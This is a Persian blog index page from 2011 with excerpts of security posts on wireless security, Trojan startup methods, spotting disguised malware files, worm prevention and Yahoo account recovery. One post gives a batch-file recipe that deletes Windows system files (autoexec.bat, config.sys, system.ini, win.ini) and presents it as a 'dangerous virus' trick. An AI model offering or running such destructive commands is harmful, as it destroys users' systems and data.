سفارش تبلیغ
صبا ویژن
شخص دیندار، ... حسادت را رها کرده است .در نتیجه، دوستی پدیدار شده است . [امام صادق علیه السلام]
 
جمعه 90 اردیبهشت 2 , ساعت 7:17 صبح

امنیت شبکه بی سیم

 چکیده

امنیت شبکه بی سیم یک موضوع دینامیکی اس ت . مشکلات جدید به سرعت پدیدار شده اند . محققان دانشگاهی با ( و برنامه هایی که برای یک مدت کوتاه ، مثل چند ماه ، در اینترنت قابل دسترسی بوده ( WEP:Wired Equivalent Privacy را می داد، مشکلاتی پیدا کردند .از سوی WEP کلیدهای استفاده شده در شبکه (Crack) و به هر کسی اجازه شکستن دیگر کمپانی های فروش تجهیزات کامپیوتر و هیئتهای استاندارد دائماً وضعیت امنیت شبکه را به سیستمهای مقابله کننده با این مشکلات اعمال کرده و راه حلها را برای نسل بعدی محصولات آماده می کنند .در این مقاله رابطه مردم، صنعت، سیاست گذاری و فناوری را در ارتباط با امنیت شبکه های بی سیم بررسی می کنیم.
معمولاً وقتی درباره امنیت بی سیمی بحث می کنیم، تمرکز روی فناوری جدید است .غریزه طبیعی ما در جستجوی راه بهتر برای محافظت اطلاعات از مهاجمان (Firewall) حلهای فنی برای مشکلات امنیتی است ؛ مانند دیواره آتشین پیشرفته، سیستمهای ردیابی بهتری که بدون اطلاع شروع بکار کرده و برای پیدا کردن صدمه های پیشرفته در شبکه عمل می کند، و نیز محصولات امنیتی بی سیم و پروتکل هایی کاربردی برای مقابله با تهدیدهای بی سیم پیشرفته. به هر حال، فناوری فقط یک بخش کوچک از راه حل اس ت .برای امنیت حرفه ای، ما به یک دیدگاه جامع و بدون پراکندگی از امنیت بی سیمی نیاز داریم تا راه حل کامل و واقع بینانه ای برای این مشکل بسازیم.

مردم

ادامه مطلب...

جمعه 90 اردیبهشت 2 , ساعت 7:17 صبح

روشهای Trojan در هنگام راه اندازی

روشهای راه اندازی استاندارد

اکثر افراد از راههای متفاوتی که هکرها برای راه اندازی فایلهای Trojan استفاده می‌کنند آگاه نیستند. اگر هکری کامپیوتر شما را با یک Trojan آلوده کند، نیاز به انتخاب یک روش راه‌اندازی خواهد داشت، بگونه‌ای که در زمان راه‌اندازی مجدد کامپیوتر شما Trojan بارگذاری شود. روشهای معمول راه‌اندازی شامل کلیدهای اجرایی registry ، فولدر راه اندازی ویندوز، Windows Load = یا run=lines یافته شده در فایل win.ini و shell=line یافته شده در system.ini ویندوز می‌باشند.

روشهای راه اندازی خطرناک

ادامه مطلب...

جمعه 90 اردیبهشت 2 , ساعت 7:17 صبح

پیدا کردن IP فرستنده ایمیل در سایت یاهو

با استفاده از ترفندی که به شما معرفی خواهیم کرد میتوانید بدون نیاز به نرم افزار خاصی و تنها در محیط سایت یاهو و با اندکی تنظیمات ، IP شخصی که برای شما ایمیل فرستاده را بیابید.
بدین منظور:
ابتدا به صفحه ایمیلتان در یاهو بروید و سپس از بالای صفحه سایت گزینه Options را انتخاب کنید.
سپس به قسمت General Preferences بروید. در صفحه باز شده در بخش Messeges و در قسمت Headers ، تیک گزینه Show all headers on incoming messages را بزنید. سپس در پایین صفحه بر روی Save کلیک کنید.
حال اگر یکی از ایمیلهای خودتو رو چک کنید در قسمت نام فرستنده میتوانید IP و اطلاعات دیگری از او را مشاهده کنید.

پیدا کردن اطلاعات یک IP

ادامه مطلب...

جمعه 90 اردیبهشت 2 , ساعت 7:13 صبح

شناسایی فایلهای هک

چگونه فایل های هک را شناسایی کنیم؟ سوالی که بسیاری از کاربران روزانه از خودشان میپرسند. در دنیای ناامن اینترنت ، این سوال یکی از مهم ترین ارکان امنیتی سیستمهای کامپیوتری میباشد. به عنوان مثال در هنگام چت کردن چگونه پی ببریم فایلی که برای ما ارسال شده یک فایل هک است یا خیر؟ در این ترفند قصد داریم روش های شناسایی این فایلهای خطرناک را به شما معرفی کنیم.
وقتی شخصی فایلی را برای شما از طریق یاهو مسنجر ارسال می کند در پیغامی که برای شما مبنی بر تایید آن می آید نام شخص فرستنده نام فایل حجم آن و همچنین فرمت و از این قبیل اطلاعات در آن قید شده است . شما باید توجه داشته باشید که آیا فایلی که برای شما ارسال شده از لحاظ نوع و فرمت همان فایلی است که قرار بوده ارسال شود یا خیر ؟ در حقیقت مثلا اگر عکسی می خواهید دریافت کنید اید فایل مربوطه پسوند JPG و یا یکی از پسوندهای فایلهای گرافیکی را داشته باشد.
نه اینکه فایلی با پسوند اجرایی Exe و یا Bat برای شما ارسال شود و فرستنده هم مدعی باشد که این یک فایل تصویری است.
در واقع فایلهای هک که با نرم افزارهای تروجان ساز ساخته می شوند ، در قسمت پسوند دارای پسوندهایی مثل SCR یا ExE و ... و یا مثل mypic. jpg.scr می باشند که نشان دهنده آن است که فایل فرستاده شده یکی از انواع فایل های ساخته شده توسط نرم افزارهای مخرب است که برای بدست اوردن پسورد شما می باشد.
بنابراین همواره نوع پسوند فایلهای دریافتی را زیر نظر داشته باشید و بدانید که از این طریق و قبل از هر چیز (حتی قبل از استفاده از نرم افزارهای ضد هک و ضد ویروس) می توانید تا حد زیادی از کیفیت نوع و چگونگی عملکرد و ماهیت یک فایل اطلاع حاصل کنید.
فرضأ مطمئن باشید که یک فایل ویروسی نباشد میتواند پس از اجرا بلا های ناخواسته برسر سیستم شما بیاورد.

ادامه مطلب...

جمعه 90 اردیبهشت 2 , ساعت 7:12 صبح

ساخت ویروسی ساده ولی خطرناک!

قصد داریم ترفندی خطرناک (!) را به شما معرفی کنیم که با استفاده از آن می توانید بدون نیاز به نرم افزار خاصی و تنها با استفاده از Notepad ویندوز ویروس خطرناکی بسازید. با اجرای این ویروس ، کامپیوتر مورد نظر Reset شده و دیگر ویندوز آن بالا نمیاید! لازم به ذکر است که این ترفند تنها جنبه آموزشی داشته و هر گونه استفاده نابجا از آن به عهده خود فرد میباشد.
ابتدا Notepad ویندوز را باز کنید. سپس این عبارت زیر را در داخلش کپی کنید:
del autoexec.bat del config.sys cd winnt del system.ini del win.ini
سپس فایل رو با پسوند Bat . ذخیره کنید.

ساخت یک ویروس ( تروجان ) ساده ولی خطرناک

این ویروس چیز سختی نیست ولی خیلی خطرناکه و باعث میشه تنها با یک کلیک کل اطلاعات درایو مورد نظر پاک بشه.
اول از همه روی دسکتاپ رایت کلیک کنید بعدش New ShortCut بسازید. یه صفحه باز میشه در اون بنویسید:

ادامه مطلب...

جمعه 90 اردیبهشت 2 , ساعت 7:11 صبح

تولید انواع قفل های دیجیتالی

مقدمه


در جنگ های رودررو و فیزیکی، ایجاد بسترهای امنیتی، بیشتر در قالب سنگر، خاکریز و غیره معنای واقعی پیدا می کند، ولی در جنگ های سایبری که در جهت سرقت، نابودسازی و تغییر اطلاعات محرمانه انجام می شود، ایجاد بستر امنیتی در قالب سرویس های امنیتی مانند فایروال، آنتی ویروس، سیستم تشخیص نفوذ، آنتی اسپم، سیستم ضدجاسوسی، همچنین استفاده از قفل ها و غیره معنا پیدا می کند. امروزه یکی از دغدغه های مهم در عرصه اطلاعات، جلوگیری از نفوذ به سیستم هاست. به همین دلیل تخصص تولید قفل و روش های شکستن آن به عنوان یکی از شاخه های مهم امنیتی، اهمیت دو چندانی یافته است، تا حدی که با داشتن قفل های مناسب می توان پایداری سیستم را در مقابل حملات مختلف حفظ کرد.

انواع قفل ها


الف – قفل های سخت افزاری
ب – قفل های نرم افزاری
ج- قفل های CD، DVD وغیره
د- قفل های اینترنتی

الف – قفل های سخت افزاری

ادامه مطلب...

جمعه 90 اردیبهشت 2 , ساعت 7:9 صبح

نکاتی برای جلوگیری از ورود کرم ها به سیستم

از آنجائیکه این نوع برنامه‌ها ( worms ) امروزه گسترش بیشتری یافته و باید بیشتر از سایر برنامه‌های مخرب از آنها دوری کنیم، از این رو به این نوع برنامه های مخرب بیشتر می‌پردازیم.
کرمها برنامه‌های کوچکی هستند که با رفتاری بسیار موذیانه به درون سیستم رسوخ کرده، بدون واسطه خود را تکثیر کرده و خیلی زود سراسر سیستم را فرا می‌گیرند. در زیر نکاتی برای جلوگیری از ورود کرمها آورده شده است.
1) بیشتر کرمهایی که از طریق E-mail گسترش پیدا می‌کنند از طریق نرم افزارهای microsoft outlook و یا out look express وارد سیستم می‌شوند. اگر شما از این نرم افزار استفاده می‌کنید پیشنهاد می شود همیشه آخرین نسخه security patch این نرم افزار را از سایت microsoft دریافت و به روز کنید.
همچنین بهتر است علاوه بر به روز کردن این قسمت از نرم افزار outlook سعی کنید سایر نرم افزارها و حتی سیستم عامل خود را نیز در صورت امکان همیشه به روز نگه دارید، و یا حداقل بعضی از تکه‌های آنها را که به صورت بروز درآمده قابل دسترسی است.
اگر از روی اینترنت بروز می‌کنید و یا از cd ها و بسته‌های نرم افزاری آماده در بازار ،از اصل بودن آنها اطمینان حاصل کنید.

ادامه مطلب...

جمعه 90 اردیبهشت 2 , ساعت 7:9 صبح

همه چیز درباره ی مخرّب های کامپیوتری (1)

ویروس کامپیوتری چیست؟

ویروس کامپیوتر برنامه‌ای است که می‌تواند نسخه‌های قابل اجرایی از خود را در برنامه‌های دیگر قرار دهد. هر برنامه آلوده می‌تواند به نوبه خود نسخه‌های دیگری از ویروس را در برنامه‌های دیگر قرار دهد. برنامه‌ای را باید برنامه ویروس نامید که همگی ویژگیهای زیر را داشته باشد:
1) تغییر دادن نرم افزارهایی که به برنامه ویروس متعلق نیستند با چسباندن قسمتهایی از برنامه ویروس به این برنامه‌های دیگر
2) قابلیت انجام تغییر در بعضی از برنامه‌ها.
3) قابلیت تشخیص اینکه یک برنامه قبلاً تغییر داده شده است یا خیر.
4) قابلیت جلوگیری از تغییر بیشتر یک برنامه در صورتی که معلوم شود قبلاً توسط ویروس تغییر داده شده است.
5) نرم افزارهای تغییر داده شده ویژگیهای 1 الی 4 را به خود می‌گیرند. اگر برنامه‌ای فاقد یک یا چند خاصیت از خواص فوق باشد، آنرا نمی‌توان به طور قاطع ویروس تلقی کرد.

آشنایی با انواع مختلف برنامه‌های مخرب

ادامه مطلب...

جمعه 90 اردیبهشت 2 , ساعت 7:9 صبح

بازیابی پسورد هک شده یا فراموش شده در یاهو

یکی از مشکلاتی که تقریبأ گریبانگیر تمامی کاربران اینترنت است هک شدن ID آنها توسط هکر هاست. این مشکل بیشتر به دلیل عدم آشنایی کاربران مبتدی با مسائل امنیتی پیش میاید و هکرها از این موضوع سوء استفاده می کنند. اما پس از هک شدن ID یاهو چه باید کرد؟!
جالب است بدانید فقط یک راه منطقی برای اینکار وجود دارد! که هم اکنون به توضیح آن خواهیم پرداخت. در صورتی که پسورد ID خود را نیز فراموش کرده اید این ترفند چاره شما خواهد بود. هنگامی که ID کاربر هک میشود ، پس گرفتن ID بسیار ساده است ، به شرطی که شما به هنگام ثبت این ID دقت کافی به خرج داده باشید! به هنگام ثبت ID و ایمیل ، در فرم ثبت نام از شما درخواست ثبت سه گزینه می شود:

ادامه مطلب...

<   <<   6   7   8   9      

لیست کل یادداشت های این وبلاگ